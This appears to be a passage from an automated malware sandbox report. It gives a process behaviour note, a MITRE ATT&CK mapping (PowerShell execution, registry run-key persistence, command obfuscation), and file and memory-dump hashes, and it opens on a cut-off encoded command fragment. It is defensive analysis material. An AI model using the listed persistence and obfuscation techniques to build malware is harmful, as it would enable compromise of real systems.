cAKQApAHwAaQBlAHgA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
027f752ee0cbbc3ac151148c1292faee

SHA1
79a3e6fd6e0a6db95f8d45eb761a629c260f937c

SHA256
0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

SHA512
0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1ydpfag.qga.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4428-23-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4428-26-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4428-22-0x00007FF9911F0000-0x00007FF991CB1000-memory.dmp

Filesize
10.8MB

Download
memory/4428-21-0x0000020CAB700000-0x0000020CAB722000-memory.dmp

Filesize
136KB

Download
memory/4428-11-0x00007FF9911F3000-0x00007FF9911F5000-memory.dmp

Filesize
8KB

Download
memory/4972-0-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-6-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-1-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-3-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-4-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-5-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-8-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-7-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-71-0x0000000140000000-0x00000001403B0000-memory.dmp

Filesize
3.7MB

Download
memory/4972-72-0x00007FF61E620000-0x00007FF61EA10000-memory.dmp

Filesize
3.9MB

Download